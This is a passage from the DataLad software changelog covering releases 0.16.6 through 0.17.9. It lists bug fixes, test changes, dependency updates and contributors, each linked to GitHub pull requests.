<https://github.com/yarikoptic>`__)\n\n- Use Plaintext keyring backend in tests to avoid the need for\n (interactive) authentication to unlock the keyring during (CI-) test\n runs. Fixes\n `#6623 <https://github.com/datalad/datalad/issues/6623>`__ via `PR\n #7209 <https://github.com/datalad/datalad/pull/7209>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _section-11:\n\n0.17.9 (2022-11-07)\n===================\n\n.. _bug-fixes-10:\n\nBug Fixes\n---------\n\n- Various small fixups ran after looking post-release and trying to\n build Debian package. `PR\n #7112 <https://github.com/datalad/datalad/pull/7112>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- BF: Fix add-archive-contents try-finally statement by defining\n variable earlier. `PR\n #7117 <https://github.com/datalad/datalad/pull/7117>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\n- Fix RIA file URL reporting in exception handling. `PR\n #7123 <https://github.com/datalad/datalad/pull/7123>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\n- HTTP download treated ‘429 - too many requests’ as an authentication\n issue and was consequently trying to obtain credentials. Fixes\n `#7129 <https://github.com/datalad/datalad/issues/7129>`__ via `PR\n #7129 <https://github.com/datalad/datalad/pull/7129>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _dependencies-2:\n\nDependencies\n------------\n\n- Unrestrict pytest and pytest-cov versions. `PR\n #7125 <https://github.com/datalad/datalad/pull/7125>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n- Remove remaining references to ``nose`` and the implied requirement\n for building the documentation Fixes\n `#7100 <https://github.com/datalad/datalad/issues/7100>`__ via `PR\n #7136 <https://github.com/datalad/datalad/pull/7136>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _internal-8:\n\nInternal\n--------\n\n- Use datalad/release-action. Fixes\n `#7110 <https://github.com/datalad/datalad/issues/7110>`__. `PR\n #7111 <https://github.com/datalad/datalad/pull/7111>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n- Fix all logging to use %-interpolation and not .format, sort imports\n in touched files, add pylint-ing for % formatting in log messages to\n ``tox -e lint``. `PR\n #7118 <https://github.com/datalad/datalad/pull/7118>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _tests-9:\n\nTests\n-----\n\n- Increase the upper time limit after which we assume that a process is\n stalling. That should reduce false positives from\n ``datalad.support.tests.test_parallel.py::test_stalling``, without\n impacting the runtime of passing tests. `PR\n #7119 <https://github.com/datalad/datalad/pull/7119>`__ (by\n `@christian-monch <https://github.com/christian-monch>`__)\n\n- XFAIL a check on length of results in test_gracefull_death. `PR\n #7126 <https://github.com/datalad/datalad/pull/7126>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- Configure Git to allow for “file” protocol in tests. `PR\n #7130 <https://github.com/datalad/datalad/pull/7130>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _section-12:\n\n0.17.8 (2022-10-24)\n===================\n\n.. _bug-fixes-11:\n\nBug Fixes\n---------\n\n- Prevent adding duplicate entries to .gitmodules. `PR\n #7088 <https://github.com/datalad/datalad/pull/7088>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- [BF] Prevent double yielding of impossible get result Fixes\n `#5537 <https://github.com/datalad/datalad/issues/5537>`__. `PR\n #7093 <https://github.com/datalad/datalad/pull/7093>`__ (by\n `@jsheunis <https://github.com/jsheunis>`__)\n\n- Stop rendering the output of internal ``subdatset()`` call in the\n results of ``run_procedure()``. Fixes\n `#7091 <https://github.com/datalad/datalad/issues/7091>`__ via `PR\n #7094 <https://github.com/datalad/datalad/pull/7094>`__ (by\n `@mslw <https://github.com/mslw>`__ & `@mih <https://github.com/mih>`__)\n\n- Improve handling of ``--existing reconfigure`` in\n ``create-sibling-ria``: previously, the command would not make the\n underlying ``git init`` call for existing local repositories, leading\n to some configuration updates not being applied. Partially addresses\n https://github.com/datalad/datalad/issues/6967 via\n https://github.com/datalad/datalad/pull/7095 (by @mslw)\n\n- Ensure subprocess environments have a valid path in\n ``os.environ['PWD']``, even if a Path-like object was given to the\n runner on subprocess creation or invocation. Fixes\n `#7040 <https://github.com/datalad/datalad/issues/7040>`__ via `PR\n #7107 <https://github.com/datalad/datalad/pull/7107>`__ (by\n `@christian-monch <https://github.com/christian-monch>`__)\n\n- Improved reporting when using ``dry-run`` with github-like\n ``create-sibling*`` commands (``-gin``, ``-gitea``, ``-github``,\n ``-gogs``). The result messages will now display names of the\n repositories which would be created (useful for recursive\n operations). `PR\n #7103 <https://github.com/datalad/datalad/pull/7103>`__ (by\n `@mslw <https://github.com/mslw>`__)\n\n.. _section-13:\n\n0.17.7 (2022-10-14)\n===================\n\n.. _bug-fixes-12:\n\nBug Fixes\n---------\n\n- Let ``EnsureChoice`` report the value is failed validating. `PR\n #7067 <https://github.com/datalad/datalad/pull/7067>`__ (by\n `@mih <https://github.com/mih>`__)\n\n- Avoid writing to stdout/stderr from within datalad sshrun. This could\n lead to broken pipe errors when cloning via SSH and was superfluous\n to begin with. Fixes https://github.com/datalad/datalad/issues/6599\n via https://github.com/datalad/datalad/pull/7072 (by @bpoldrack)\n\n- BF: lock across threads check/instantiation of Flyweight instances.\n Fixes `#6598 <https://github.com/datalad/datalad/issues/6598>`__ via\n `PR #7075 <https://github.com/datalad/datalad/pull/7075>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _internal-9:\n\nInternal\n--------\n\n- Do not use ``gen4``-metadata methods in ``datalad metadata``-command.\n `PR #7001 <https://github.com/datalad/datalad/pull/7001>`__ (by\n `@christian-monch <https://github.com/christian-monch>`__)\n\n- Revert “Remove chardet version upper limit” (introduced in\n 0.17.6~11^2) to bring back upper limit <= 5.0.0 on chardet. Otherwise\n we can get some deprecation warnings from requests `PR\n #7057 <https://github.com/datalad/datalad/pull/7057>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- Ensure that ``BatchedCommandError`` is raised if the subprocesses of\n ``BatchedCommand`` fails or raises a ``CommandError``. `PR\n #7068 <https://github.com/datalad/datalad/pull/7068>`__ (by\n `@christian-monch <https://github.com/christian-monch>`__)\n\n- RF: remove unused code str-ing PurePath. `PR\n #7073 <https://github.com/datalad/datalad/pull/7073>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- Update GitHub Actions action versions. `PR\n #7082 <https://github.com/datalad/datalad/pull/7082>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n.. _tests-10:\n\nTests\n-----\n\n- Fix broken test helpers for result record testing that would falsely\n pass. `PR #7002 <https://github.com/datalad/datalad/pull/7002>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _section-14:\n\n0.17.6 (2022-09-21)\n===================\n\n.. _bug-fixes-13:\n\nBug Fixes\n---------\n\n- UX: push - provide specific error with details if push failed due to\n permission issue. `PR\n #7011 <https://github.com/datalad/datalad/pull/7011>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- Fix datalad –help to not have *Global options* empty with python 3.10\n and list options in “options:” section. `PR\n #7028 <https://github.com/datalad/datalad/pull/7028>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- Let ``create`` touch the dataset root, if not saving in parent\n dataset. `PR #7036 <https://github.com/datalad/datalad/pull/7036>`__\n (by `@mih <https://github.com/mih>`__)\n\n- Let ``get_status_dict()`` use exception message if none is passed.\n `PR #7037 <https://github.com/datalad/datalad/pull/7037>`__ (by\n `@mih <https://github.com/mih>`__)\n\n- Make choices for ``status|diff --annex`` and\n ``status|diff --untracked`` visible. `PR\n #7039 <https://github.com/datalad/datalad/pull/7039>`__ (by\n `@mih <https://github.com/mih>`__)\n\n- push: Assume 0 bytes pushed if git-annex does not provide bytesize.\n `PR #7049 <https://github.com/datalad/datalad/pull/7049>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _internal-10:\n\nInternal\n--------\n\n- Use scriv for CHANGELOG generation in release workflow. `PR\n #7009 <https://github.com/datalad/datalad/pull/7009>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n- Stop using auto. `PR\n #7024 <https://github.com/datalad/datalad/pull/7024>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n.. _tests-11:\n\nTests\n-----\n\n- Allow for any 2 from first 3 to be consumed in test_gracefull_death.\n `PR #7041 <https://github.com/datalad/datalad/pull/7041>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.17.5 (Fri Sep 02 2022)\n========================\n\nBug Fix\n-------\n\n- BF: blacklist 23.9.0 of keyring as introduces regression\n `#7003 <https://github.com/datalad/datalad/pull/7003>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Make the manpages build reproducible via datalad.source.epoch (to be\n used in Debian packaging)\n `#6997 <https://github.com/datalad/datalad/pull/6997>`__\n (`@lamby <https://github.com/lamby>`__ [email protected]\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: backquote path/drive in Changelog\n `#6997 <https://github.com/datalad/datalad/pull/6997>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\nAuthors: 3\n----------\n\n- Chris Lamb (`@lamby <https://github.com/lamby>`__)\n- DataLad Bot ([email protected])\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.17.4 (Tue Aug 30 2022)\n========================\n\n.. _bug-fix-1:\n\nBug Fix\n-------\n\n- BF: make logic more consistent for files=[] argument (which is False\n but not None)\n `#6976 <https://github.com/datalad/datalad/pull/6976>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Run pytests in parallel (-n 2) on appveyor\n `#6987 <https://github.com/datalad/datalad/pull/6987>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Add workflow for autogenerating changelog snippets\n `#6981 <https://github.com/datalad/datalad/pull/6981>`__\n (`@jwodder <https://github.com/jwodder>`__)\n- Provide ``/dev/null`` (``b:\\nul`` on Windows) instead of empty string\n as a git-repo to avoid reading local repo configuration\n `#6986 <https://github.com/datalad/datalad/pull/6986>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- RF: call_from_parser - move code into “else” to simplify reading etc\n `#6982 <https://github.com/datalad/datalad/pull/6982>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: if early attempt to parse resulted in error, setup subparsers\n `#6980 <https://github.com/datalad/datalad/pull/6980>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Run pytests in parallel (-n 2) on Travis\n `#6915 <https://github.com/datalad/datalad/pull/6915>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Send one character (no newline) to stdout in protocol test to\n guarantee a single “message” and thus a single custom value\n `#6978 <https://github.com/datalad/datalad/pull/6978>`__\n (`@christian-monch <https://github.com/christian-monch>`__)\n\n.. _tests-12:\n\nTests\n-----\n\n- TST: test_stalling – wait x10 not just x5 time\n `#6995 <https://github.com/datalad/datalad/pull/6995>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _authors-3-1:\n\nAuthors: 3\n----------\n\n- Christian Mnch\n (`@christian-monch <https://github.com/christian-monch>`__)\n- John T. Wodder II (`@jwodder <https://github.com/jwodder>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.17.3 (Tue Aug 23 2022)\n========================\n\n.. _bug-fix-2:\n\nBug Fix\n-------\n\n- BF: git_ignore_check do not overload possible value of stdout/err if\n present `#6937 <https://github.com/datalad/datalad/pull/6937>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- DOCfix: fix docstring GeneratorStdOutErrCapture to say that treats\n both stdout and stderr identically\n `#6930 <https://github.com/datalad/datalad/pull/6930>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Explain purpose of create-sibling-ria’s –post-update-hook\n `#6958 <https://github.com/datalad/datalad/pull/6958>`__\n (`@mih <https://github.com/mih>`__)\n- ENH+BF: get_parent_paths - make / into sep option and consistently\n use “/” as path separator\n `#6963 <https://github.com/datalad/datalad/pull/6963>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF(TEMP): use git-annex from neurodebian -devel to gain fix for bug\n detected with datalad-crawler\n `#6965 <https://github.com/datalad/datalad/pull/6965>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF(TST): make tests use *path* helper for Windows “friendliness” of\n the tests `#6955 <https://github.com/datalad/datalad/pull/6955>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF(TST): prevent auto-upgrade of “remote” test sibling, do not use\n local path for URL\n `#6957 <https://github.com/datalad/datalad/pull/6957>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Forbid drop operation from symlink’ed annex (e.g. due to being cloned\n with –reckless=ephemeral) to prevent data-loss\n `#6959 <https://github.com/datalad/datalad/pull/6959>`__\n (`@mih <https://github.com/mih>`__)\n- Acknowledge git-config comment chars\n `#6944 <https://github.com/datalad/datalad/pull/6944>`__\n (`@mih <https://github.com/mih>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- Minor tuneups to please updated codespell\n `#6956 <https://github.com/datalad/datalad/pull/6956>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- TST: Add a testcase for #6950\n `#6957 <https://github.com/datalad/datalad/pull/6957>`__\n (`@adswa <https://github.com/adswa>`__)\n- BF+ENH(TST): fix typo in code of wtf filesystems reports\n `#6920 <https://github.com/datalad/datalad/pull/6920>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- DOC: Datalad -> DataLad\n `#6937 <https://github.com/datalad/datalad/pull/6937>`__\n (`@aqw <https://github.com/aqw>`__)\n- BF: fix typo which prevented silently to not show details of\n filesystems `#6930 <https://github.com/datalad/datalad/pull/6930>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF(TST): allow for a annex repo version to upgrade if running in\n adjusted branches\n `#6927 <https://github.com/datalad/datalad/pull/6927>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- RF extensions github action to centralize configuration for\n extensions etc, use pytest for crawler\n `#6914 <https://github.com/datalad/datalad/pull/6914>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: travis - mark our directory as safe to interact with as root\n `#6919 <https://github.com/datalad/datalad/pull/6919>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: do not pretend we know what repo version git-annex would upgrade\n to `#6902 <https://github.com/datalad/datalad/pull/6902>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF(TST): do not expect log message for guessing Path to be possibly a\n URL on windows\n `#6911 <https://github.com/datalad/datalad/pull/6911>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- ENH(TST): Disable coverage reporting on travis while running pytest\n `#6898 <https://github.com/datalad/datalad/pull/6898>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- RF: just rename internal variable from unclear “op” to “io”\n `#6907 <https://github.com/datalad/datalad/pull/6907>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- DX: Demote loglevel of message on url parameters to DEBUG while\n guessing RI `#6891 <https://github.com/datalad/datalad/pull/6891>`__\n (`@adswa <https://github.com/adswa>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- Fix and expand datalad.runner type annotations\n `#6893 <https://github.com/datalad/datalad/pull/6893>`__\n (`@christian-monch <https://github.com/christian-monch>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- Use pytest to test datalad-metalad in test_extensions-workflow\n `#6892 <https://github.com/datalad/datalad/pull/6892>`__\n (`@christian-monch <https://github.com/christian-monch>`__)\n- Let push honor multiple publication dependencies declared via\n siblings `#6869 <https://github.com/datalad/datalad/pull/6869>`__\n (`@mih <https://github.com/mih>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- ENH: upgrade versioneer from versioneer-0.20.dev0 to\n versioneer-0.23.dev0\n `#6888 <https://github.com/datalad/datalad/pull/6888>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- ENH: introduce typing checking and GitHub workflow\n `#6885 <https://github.com/datalad/datalad/pull/6885>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- RF,ENH(TST): future proof testing of git annex version upgrade + test\n annex init on all supported versions\n `#6880 <https://github.com/datalad/datalad/pull/6880>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- ENH(TST): test against supported git annex repo version 10 + make it\n a full sweep over tests\n `#6881 <https://github.com/datalad/datalad/pull/6881>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: RF f-string uses in logger to %-interpolations\n `#6886 <https://github.com/datalad/datalad/pull/6886>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Merge branch ‘bf-sphinx-5.1.0’ into maint\n `#6883 <https://github.com/datalad/datalad/pull/6883>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF(DOC): workaround for #10701 of sphinx in 5.1.0\n `#6883 <https://github.com/datalad/datalad/pull/6883>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Clarify confusing INFO log message from get() on dataset installation\n `#6871 <https://github.com/datalad/datalad/pull/6871>`__\n (`@mih <https://github.com/mih>`__)\n- Protect again failing to load a command interface from an extension\n `#6879 <https://github.com/datalad/datalad/pull/6879>`__\n (`@mih <https://github.com/mih>`__)\n- Support unsetting config via ``datalad -c :<name>``\n `#6864 <https://github.com/datalad/datalad/pull/6864>`__\n (`@mih <https://github.com/mih>`__)\n- Fix DOC string typo in the path within AnnexRepo.annexstatus, and\n replace with proper sphinx reference\n `#6858 <https://github.com/datalad/datalad/pull/6858>`__\n (`@christian-monch <https://github.com/christian-monch>`__)\n- Improved support for saving typechanges\n `#6793 <https://github.com/datalad/datalad/pull/6793>`__\n (`@mih <https://github.com/mih>`__)\n\nPushed to ``maint``\n-------------------\n\n- BF: Remove duplicate ds key from result record\n (`@adswa <https://github.com/adswa>`__)\n- DOC: fix capitalization of service names\n (`@aqw <https://github.com/aqw>`__)\n\n.. _tests-13:\n\nTests\n-----\n\n- BF(TST,workaround): just xfail failing archives test on NFS\n `#6912 <https://github.com/datalad/datalad/pull/6912>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\nAuthors: 5\n----------\n\n- Adina Wagner (`@adswa <https://github.com/adswa>`__)\n- Alex Waite (`@aqw <https://github.com/aqw>`__)\n- Christian Mnch\n (`@christian-monch <https://github.com/christian-monch>`__)\n- Michael Hanke (`@mih <https://github.com/mih>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.17.2 (Sat Jul 16 2022)\n========================\n\n.. _bug-fix-3:\n\nBug Fix\n-------\n\n- BF(TST): do proceed to proper test for error being caught for recent\n git-annex on windows with symlinks\n `#6850 <https://github.com/datalad/datalad/pull/6850>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Addressing problem testing against python 3.10 on Travis (skip more\n annex versions)\n `#6842 <https://github.com/datalad/datalad/pull/6842>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- XFAIL test_runner_parametrized_protocol on python3.8 when getting\n duplicate output\n `#6837 <https://github.com/datalad/datalad/pull/6837>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: Make create’s check for procedures work with several again\n `#6841 <https://github.com/datalad/datalad/pull/6841>`__\n (`@adswa <https://github.com/adswa>`__)\n- Support older pytests\n `#6836 <https://github.com/datalad/datalad/pull/6836>`__\n (`@jwodder <https://github.com/jwodder>`__)\n\n.. _authors-3-2:\n\nAuthors: 3\n----------\n\n- Adina Wagner (`@adswa <https://github.com/adswa>`__)\n- John T. Wodder II (`@jwodder <https://github.com/jwodder>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.17.1 (Mon Jul 11 2022)\n========================\n\n.. _bug-fix-4:\n\nBug Fix\n-------\n\n- DOC: minor fix - consistent DataLad (not Datalad) in docs and\n CHANGELOG `#6830 <https://github.com/datalad/datalad/pull/6830>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- DOC: fixup/harmonize Changelog for 0.17.0 a little\n `#6828 <https://github.com/datalad/datalad/pull/6828>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: use –python-match minor option in new datalad-installer release\n to match outside version of Python\n `#6827 <https://github.com/datalad/datalad/pull/6827>`__\n (`@christian-monch <https://github.com/christian-monch>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- Do not quote paths for ssh >= 9\n `#6826 <https://github.com/datalad/datalad/pull/6826>`__\n (`@christian-monch <https://github.com/christian-monch>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- Suppress DeprecationWarning to allow for distutils to be used\n `#6819 <https://github.com/datalad/datalad/pull/6819>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- RM(TST): remove testing of datalad.test which was removed from 0.17.0\n `#6822 <https://github.com/datalad/datalad/pull/6822>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Avoid import of nose-based tests.utils, make skip_if_no_module() and\n skip_if_no_network() allowed at module level\n `#6817 <https://github.com/datalad/datalad/pull/6817>`__\n (`@jwodder <https://github.com/jwodder>`__)\n- BF(TST): use higher level asyncio.run instead of\n asyncio.get_event_loop in test_inside_async\n `#6808 <https://github.com/datalad/datalad/pull/6808>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _authors-3-3:\n\nAuthors: 3\n----------\n\n- Christian Mnch\n (`@christian-monch <https://github.com/christian-monch>`__)\n- John T. Wodder II (`@jwodder <https://github.com/jwodder>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.17.0 (Thu Jul 7 2022) – pytest migration\n==========================================\n\n.. _enhancements-and-new-features-3:\n\nEnhancements and new features\n-----------------------------\n\n- “log” progress bar now reports about starting a specific action as\n well. `#6756 <https://github.com/datalad/datalad/pull/6756>`__ (by\n @yarikoptic)\n- Documentation and behavior of traceback reporting for log messages\n via ``DATALAD_LOG_TRACEBACK`` was improved to yield a more compact\n report. The documentation for this feature has been clarified.\n `#6746 <https://github.com/datalad/datalad/pull/6746>`__ (by @mih)\n- ``datalad unlock`` gained a progress bar.\n `#6704 <https://github.com/datalad/datalad/pull/6704>`__ (by @adswa)\n- When ``create-sibling-gitlab`` is called on non-existing subdatasets\n or paths it now returns an impossible result instead of no feedback\n at all. `#6701 <https://github.com/datalad/datalad/pull/6701>`__ (by\n @adswa)\n- ``datalad wtf`` includes a report on file system types of commonly\n used paths. `#6664 <https://github.com/datalad/datalad/pull/6664>`__\n (by @adswa)\n- Use next generation metadata code in search, if it is available.\n `#6518 <https://github.com/datalad/datalad/pull/6518>`__ (by\n @christian-monch)\n\nDeprecations and removals\n-------------------------\n\n- Remove unused and untested log helpers ``NoProgressLog`` and\n ``OnlyProgressLog``.\n `#6747 <https://github.com/datalad/datalad/pull/6747>`__ (by @mih)\n- Remove unused ``sorted_files()`` helper.\n `#6722 <https://github.com/datalad/datalad/pull/6722>`__ (by @adswa)\n- Discontinued the value ``stdout`` for use with the config variable\n ``datalad.log.target`` as its use would inevitably break special\n remote implementations.\n `#6675 <https://github.com/datalad/datalad/pull/6675>`__ (by\n @bpoldrack)\n- ``AnnexRepo.add_urls()`` is deprecated in favor of\n ``AnnexRepo.add_url_to_file()`` or a direct call to\n ``AnnexRepo.call_annex()``.\n `#6667 <https://github.com/datalad/datalad/pull/6667>`__ (by @mih)\n- ``datalad test`` command and supporting functionality (e.g.,\n ``datalad.test``) were removed.\n `#6273 <https://github.com/datalad/datalad/pull/6273>`__ (by\n @jwodder)\n\n.. _bug-fixes-14:\n\nBug Fixes\n---------\n\n- ``export-archive`` does not rely on ``normalize_path()`` methods\n anymore and became more robust when called from subdirectories.\n `#6745 <https://github.com/datalad/datalad/pull/6745>`__ (by @adswa)\n- Sanitize keys before checking content availability to ensure that the\n content availability of files with URL- or custom backend keys is\n correctly determined and marked.\n `#6663 <https://github.com/datalad/datalad/pull/6663>`__ (by @adswa)\n- Ensure saving a new subdataset to a superdataset yields a valid\n ``.gitmodules`` record regardless of whether and how a path\n constraint is given to the ``save()`` call. Fixes #6547\n `#6790 <https://github.com/datalad/datalad/pull/6790>`__ (by @mih)\n- ``save`` now repairs annex symlinks broken by a ``git-mv`` operation\n prior recording a new dataset state. Fixes #4967\n `#6795 <https://github.com/datalad/datalad/pull/6795>`__ (by @mih)\n\n.. _documentation-9:\n\nDocumentation\n-------------\n\n- API documentation for log helpers, like ``log_progress()`` is now\n included in the renderer documentation.\n `#6746 <https://github.com/datalad/datalad/pull/6746>`__ (by @mih)\n- New design document on progress reporting.\n `#6734 <https://github.com/datalad/datalad/pull/6734>`__ (by @mih)\n- Explain downstream consequences of using ``--fast`` option in\n ``addurls``. `#6684 <https://github.com/datalad/datalad/pull/6684>`__\n (by @jdkent)\n\n.. _internal-11:\n\nInternal\n--------\n\n- Inline code of ``create-sibling-ria`` has been refactored to an\n internal helper to check for siblings with particular names across\n dataset hierarchies in ``datalad-next``, and is reintroduced into\n core to modularize the code base further.\n `#6706 <https://github.com/datalad/datalad/pull/6706>`__ (by @adswa)\n- ``get_initialized_logger`` now lets a given ``logtarget`` take\n precedence over ``datalad.log.target``.\n `#6675 <https://github.com/datalad/datalad/pull/6675>`__ (by\n @bpoldrack)\n- Many uses of deprecated call options were replaced with the\n recommended ones.\n `#6273 <https://github.com/datalad/datalad/pull/6273>`__ (by\n @jwodder)\n- Get rid of ``asyncio`` import by defining few noops methods from\n ``asyncio.protocols.SubprocessProtocol`` directly in\n ``WitlessProtocol``.\n `#6648 <https://github.com/datalad/datalad/pull/6648>`__ (by\n @yarikoptic)\n- Consolidate ``GitRepo.remove()`` and ``AnnexRepo.remove()`` into a\n single implementation.\n `#6783 <https://github.com/datalad/datalad/pull/6783>`__ (by @mih) ##\n Tests\n- Discontinue use of ``with_testrepos`` decorator other than for the\n deprecation cycle for ``nose``.\n `#6690 <https://github.com/datalad/datalad/pull/6690>`__ (by @mih\n @bpoldrack) See\n `#6144 <https://github.com/datalad/datalad/issues/6144>`__ for full\n list of changes.\n- Remove usage of deprecated ``AnnexRepo.add_urls`` in tests.\n `#6683 <https://github.com/datalad/datalad/pull/6683>`__ (by\n @bpoldrack)\n- Minimalistic (adapters, no assert changes, etc) migration from\n ``nose`` to ``pytest``. Support functionality possibly used by\n extensions and relying on ``nose`` helpers is left in place to avoid\n affecting their run time and defer migration of their test setups..\n `#6273 <https://github.com/datalad/datalad/pull/6273>`__ (by\n @jwodder)\n\nAuthors: 7\n----------\n\n- Yaroslav Halchenko (@yarikoptic)\n- Michael Hanke (@mih)\n- Benjamin Poldrack (@bpoldrack)\n- Adina Wagner (@adswa)\n- John T. Wodder (@jwodder)\n- Christian Mnch (@christian-monch)\n- James Kent (@jdkent)\n\n0.16.7 (Wed Jul 06 2022)\n========================\n\n.. _bug-fix-5:\n\nBug Fix\n-------\n\n- Fix broken annex symlink after git-mv before saving + fix a race\n condition in ssh copy test\n `#6809 <https://github.com/datalad/datalad/pull/6809>`__\n (`@christian-monch <https://github.com/christian-monch>`__\n `@mih <https://github.com/mih>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- Do not ignore already known status info on submodules\n `#6790 <https://github.com/datalad/datalad/pull/6790>`__\n (`@mih <https://github.com/mih>`__)\n- Fix “common data source” test to use a valid URL (maint-based &\n extended edition)\n `#6788 <https://github.com/datalad/datalad/pull/6788>`__\n (`@mih <https://github.com/mih>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- Upload coverage from extension tests to Codecov\n `#6781 <https://github.com/datalad/datalad/pull/6781>`__\n (`@jwodder <https://github.com/jwodder>`__)\n- Clean up line end handling in GitRepo\n `#6768 <https://github.com/datalad/datalad/pull/6768>`__\n (`@christian-monch <https://github.com/christian-monch>`__)\n- Do not skip file-URL tests on windows\n `#6772 <https://github.com/datalad/datalad/pull/6772>`__\n (`@christian-monch <https://github.com/christian-monch>`__)\n- Fix test errors caused by updated chardet v5 release\n `#6777 <https://github.com/datalad/datalad/pull/6777>`__\n (`@christian-monch <https://github.com/christian-monch>`__)\n- Preserve final trailing slash in ``call_git()`` output\n `#6754 <https://github.com/datalad/datalad/pull/6754>`__\n (`@adswa <https://github.com/adswa>`__\n `@yarikoptic <https://github.com/yarikoptic>`__\n `@christian-monch <https://github.com/christian-monch>`__)\n\n.. _pushed-to-maint-1:\n\nPushed to ``maint``\n-------------------\n\n- Make sure a subdataset is saved with a complete .gitmodules record\n (`@mih <https://github.com/mih>`__)\n\n.. _authors-5-1:\n\nAuthors: 5\n----------\n\n- Adina Wagner (`@adswa <https://github.com/adswa>`__)\n- Christian Mnch\n (`@christian-monch <https://github.com/christian-monch>`__)\n- John T. Wodder II (`@jwodder <https://github.com/jwodder>`__)\n- Michael Hanke (`@mih <https://github.com/mih>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.16.6 (Tue Jun 14 2022)\n========================\n\n.. _bug-fix-6:\n\nBug Fix\n-------\n\n- Prevent duplicated result rendering when searching in default\n datasets `#6765 <https://github.com/datalad/datalad/pull/6765>`__\n (`@christian-monch <https://github.com/christian-monch>`__)\n- BF(workaround): skip test_ria_postclonecfg on OSX for now\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF(workaround to #6759): if saving credential failed, just log error\n and continue `#6762 <https://github.com/datalad/datalad/pull/6762>`__\n (`@yarikoptic 